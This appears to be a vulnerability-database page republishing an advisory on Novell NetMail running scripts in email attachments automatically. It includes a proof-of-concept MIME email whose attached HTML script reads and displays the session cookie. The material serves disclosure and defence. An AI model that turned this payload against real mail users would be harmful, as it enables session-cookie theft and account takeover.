Vulners
Lucene search
Novell NetMail 3.x Automatic Script Execution Vulnerability
source: http://www.securityfocus.com/bid/14171/info
Novell NetMail email client is prone to an input validation vulnerability.
Reports indicate that HTML and JavaScript attached to received email messages is executed automatically, when the email message is viewed.
A successful attack may allow the attacker to obtain session cookies and carry out other attacks.
All versions are considered to be vulnerable at the moment.
Content-Type: multipart/mixed; boundary="=_mixed 00279444C2257036_="
--=_mixed 00279444C2257036_=
Content-Type: text/html; charset="US-ASCII"
<br><font size=2 face="sans-serif">hi there</font>
<br>
--=_mixed 00279444C2257036_=
Content-Type: text/html; name="malxxx.html"
Content-Disposition: attachment; filename="malxxx.html"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
</HEAD>
<BODY>
<SCRIPT>
document.write('The cookie is:<br> ' + document.cookie + '<p>');
</SCRIPT>
</BODY></HTML>
--=_mixed 00279444C2257036_=--
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1